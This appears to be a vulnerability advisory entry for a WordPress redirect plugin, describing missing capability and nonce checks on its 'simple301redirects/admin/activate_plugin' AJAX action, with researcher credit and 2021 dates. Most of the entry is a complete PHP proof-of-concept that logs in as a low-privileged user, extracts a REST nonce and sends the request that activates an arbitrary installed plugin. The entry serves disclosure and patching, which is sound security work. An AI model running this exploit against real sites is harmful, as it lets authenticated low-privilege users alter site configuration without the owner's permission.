In the plugin, a lack of capability checks and insufficient nonce check on the AJAX action, simple301redirects/admin/activate_plugin, made it possible for authenticated users to activate arbitrary plugins installed on vulnerable sites.
<?php // Settings $siteurl = $argv[1]; $wp_user = $argv[2]; $wp_pass = $argv[3]; echo 'Logging in!'; // 1) Log in as sub+ $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-'); curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-login.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'log' => $wp_user, 'pwd' => $wp_pass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ]); $output = curl_exec($ch); curl_close($ch); echo 'Getting REST API Nonce!'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php?action=rest-nonce'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //Rest Nonce preg_match('/([^"]+)/', $content, $matches); $restnonce = $matches[1]; echo $restnonce; echo 'Activating Plugin!'; //Activating Plugin $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php' ); curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true ); curl_setopt( $ch, CURLOPT_POST, true ); curl_setopt( $ch, CURLOPT_POSTFIELDS, [ 'action' => 'simple301redirects/admin/activate_plugin', 'security' => $restnonce, 'basename' => 'wordfence/wordfence.php', ] ); $output = curl_exec($ch); curl_close($ch); print($output) ?>
Chloe Chamberland
Chloe Chamberland
Yes
2021-05-26 (about 12 months ago)
2021-05-26 (about 12 months ago)
2021-05-28 (about 12 months ago)